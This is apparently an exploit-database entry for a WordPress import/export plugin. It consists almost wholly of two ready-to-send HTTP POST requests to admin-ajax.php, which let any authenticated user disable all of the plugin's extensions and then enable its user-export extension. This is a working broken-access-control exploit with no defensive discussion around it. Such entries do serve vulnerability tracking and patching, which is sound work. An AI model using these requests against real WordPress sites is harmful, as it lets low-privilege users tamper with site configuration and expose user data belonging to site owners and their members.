Share
## https://sploitus.com/exploit?id=WPEX-ID:B5A8A4D1-61D9-46DD-8F52-321758172788
To disabled all extensions:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 31
Cookie: [any authenticated user]

action=wpie_ext_save_extensions&wpie_ext%5B%5D=


To enable the Export User extension:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 31
Cookie: [any authenticated user]

action=wpie_ext_save_extensions&wpie_ext%5B%5D=wpie_user_export